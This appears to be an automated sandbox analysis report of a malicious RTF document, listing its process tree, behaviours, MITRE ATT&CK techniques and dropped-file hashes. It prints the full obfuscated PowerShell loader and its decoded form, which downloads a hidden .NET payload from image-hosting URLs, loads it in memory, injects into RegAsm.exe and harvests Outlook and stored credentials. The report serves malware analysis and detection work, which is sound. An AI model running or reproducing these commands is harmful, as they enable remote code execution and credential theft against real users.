Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2360	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2788	powershell.exe
1584	powershell.exe
576	powershell.exe
1584	powershell.exe
1584	powershell.exe
1592	RegAsm.exe
1592	RegAsm.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1688	RegAsm.exe
1688	RegAsm.exe
1688	RegAsm.exe
1688	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	576	powershell.exe
Token: SeDebugPrivilege	2584	RegAsm.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2360	WINWORD.EXE
2360	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2112 wrote to memory of 2656	2112	EQNEDT32.EXE	29
PID 2112 wrote to memory of 2656	2112	EQNEDT32.EXE	29
PID 2112 wrote to memory of 2656	2112	EQNEDT32.EXE	29
PID 2112 wrote to memory of 2656	2112	EQNEDT32.EXE	29
PID 2656 wrote to memory of 2788	2656	WScript.exe	32
PID 2656 wrote to memory of 2788	2656	WScript.exe	32
PID 2656 wrote to memory of 2788	2656	WScript.exe	32
PID 2656 wrote to memory of 2788	2656	WScript.exe	32
PID 2788 wrote to memory of 1584	2788	powershell.exe	34
PID 2788 wrote to memory of 1584	2788	powershell.exe	34
PID 2788 wrote to memory of 1584	2788	powershell.exe	34
PID 2788 wrote to memory of 1584	2788	powershell.exe	34
PID 2360 wrote to memory of 2248	2360	WINWORD.EXE	35
PID 2360 wrote to memory of 2248	2360	WINWORD.EXE	35
PID 2360 wrote to memory of 2248	2360	WINWORD.EXE	35
PID 2360 wrote to memory of 2248	2360	WINWORD.EXE	35
PID 1584 wrote to memory of 576	1584	powershell.exe	36
PID 1584 wrote to memory of 576	1584	powershell.exe	36
PID 1584 wrote to memory of 576	1584	powershell.exe	36
PID 1584 wrote to memory of 576	1584	powershell.exe	36
PID 1584 wrote to memory of 1188	1584	powershell.exe	38
PID 1584 wrote to memory of 1188	1584	powershell.exe	38
PID 1584 wrote to memory of 1188	1584	powershell.exe	38
PID 1584 wrote to memory of 1188	1584	powershell.exe	38
PID 1584 wrote to memory of 1188	1584	powershell.exe	38
PID 1584 wrote to memory of 1188	1584	powershell.exe	38
PID 1584 wrote to memory of 1188	1584	powershell.exe	38
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1584 wrote to memory of 1688	1584	powershell.exe	39
PID 1688 wrote to memory of 1592	1688	RegAsm.exe	41
PID 1688 wrote to memory of 1592	1688	RegAsm.exe	41
PID 1688 wrote to memory of 1592	1688	RegAsm.exe	41
PID 1688 wrote to memory of 1592	1688	RegAsm.exe	41
PID 1688 wrote to memory of 1592	1688	RegAsm.exe	41
PID 1688 wrote to memory of 1592	1688	RegAsm.exe	41
PID 1688 wrote to memory of 1592	1688	RegAsm.exe	41
PID 1688 wrote to memory of 1592	1688	RegAsm.exe	41
PID 1688 wrote to memory of 1716	1688	RegAsm.exe	42
PID 1688 wrote to memory of 1716	1688	RegAsm.exe	42
PID 1688 wrote to memory of 1716	1688	RegAsm.exe	42
PID 1688 wrote to memory of 1716	1688	RegAsm.exe	42
PID 1688 wrote to memory of 1716	1688	RegAsm.exe	42
PID 1688 wrote to memory of 1716	1688	RegAsm.exe	42
PID 1688 wrote to memory of 1716	1688	RegAsm.exe	42
PID 1688 wrote to memory of 1716	1688	RegAsm.exe	42
PID 1688 wrote to memory of 2700	1688	RegAsm.exe	43
PID 1688 wrote to memory of 2700	1688	RegAsm.exe	43
PID 1688 wrote to memory of 2700	1688	RegAsm.exe	43
PID 1688 wrote to memory of 2700	1688	RegAsm.exe	43
PID 1688 wrote to memory of 2700	1688	RegAsm.exe	43

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a60f72316633a40d5ab45b035ecd03b7cd0162ce161946cfa2ad86d11fbc9c13.rtf"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2248

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\beautifulldaykiss.vbs"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDUDgTreMwDgTrevDgTreDcDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDkDgTreOQDgTrewDgTreDgDgTreMwDgTrexDgTreDYDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDUDgTreMwDgTrevDgTreDcDgTreMQDgTre0DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDkDgTreOQDgTrewDgTreDgDgTreMwDgTre1DgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreQwBDDgTreEEDgTreTQDgTrevDgTreDDgTreDgTreMDgTreDgTre3DgTreDUDgTreNDgTreDgTrevDgTreDcDgTreMDgTreDgTrexDgTreC4DgTreMwDgTre0DgTreDIDgTreLgDgTre1DgTreDgDgTreMQDgTreuDgTreDcDgTreNDgTreDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBNDgTreEEDgTreQwBDDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/753/713/original/new_image.jpg?1709908316', 'https://uploaddeimagens.com.br/images/004/753/714/original/new_image.jpg?1709908350'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CCAM/00754/701.342.581.741//:ptth' , '1' , 'C:\ProgramData\' , 'MACC','RegAsm',''))} }"
      4⤵
      Blocklisted process makes network request
      Adds Run key to start application
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1584
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\MACC.vbs
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:576
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:1188
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1688
      - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ybykltgmjumrykqdvtmuxhkd"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1592
      - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\jdlvmmyoxcediyehmezwiufujur"
        6⤵
        Accesses Microsoft Outlook accounts
        
        PID:1716
      - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\lyqnmwjhtkxilfalvouplzrdkjaxrz"
        6⤵
        
        PID:2700
      - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\lyqnmwjhtkxilfalvouplzrdkjaxrz"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
18af88bdd186f548c7ffaae2eae5bc63

SHA1
69298f328ce97bf9f7a651149d7c8916743a7216

SHA256
175afcf02aad42aedf006bcbd122afd2678da1be1621302c43c627a60747a648

SHA512
e611003c4a4396622e828897136f7f0612730b79f79ebe332a8d5a738bd76e51c32af85fee1e756e9f98ecdcd1b15a43cf02c0b9794e9dabb3137838a050c378

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
11ac1260541b656d2cb0aa6f91823d92

SHA1
78d5783e6472442479ca70ca390d26d6cba4e28f

SHA256
65cf8f61d9e1add0d7cac9a07ed9083d053ecc2f1b122a863f40c605e2d15bdb

SHA512
e84cbd6a91d68b78decada2a0f787d8d2039baed3f66bfd07a0a76c69950f96603ea07a8e32fe36c7d76ede925fea5afed0b285802c7f9fe6cc48622eb04e743

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab1E3A.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1E4D.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1FAA.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\ybykltgmjumrykqdvtmuxhkd

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
9bd4e04671f5fae29d9231b57925473c

SHA1
6198344970e668c13b805b6a207af43df9e2ae5d

SHA256
3fd46a2dca83ddee5fe2966f229c6ffdf41da2642bec2d45dd159f940743fce7

SHA512
211142d76b8922b80cebaf736c7f09494b545c7341bf5b7ba52bee1577102ed43d2131aa37125914665236e14641da4029d994239becd05a9db8863447c835c8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9caadab01b2c3bca067e935d6d3b80e4

SHA1
3f78c931245e735b699e1478b14413ebe08dc6ef

SHA256
03e2dd9d3459affefce708719bb40dc7789fe57458ec8771e9af8086f635427b

SHA512
42bc78068f0c2cd43de258dc16d98cc204bfd4625ca4e4f0db7592572dfef8a077cdb209c67a35da8b4fa5c218c537b076c3ecafd4f1fd2db6ad1817beef8656

Download Submit
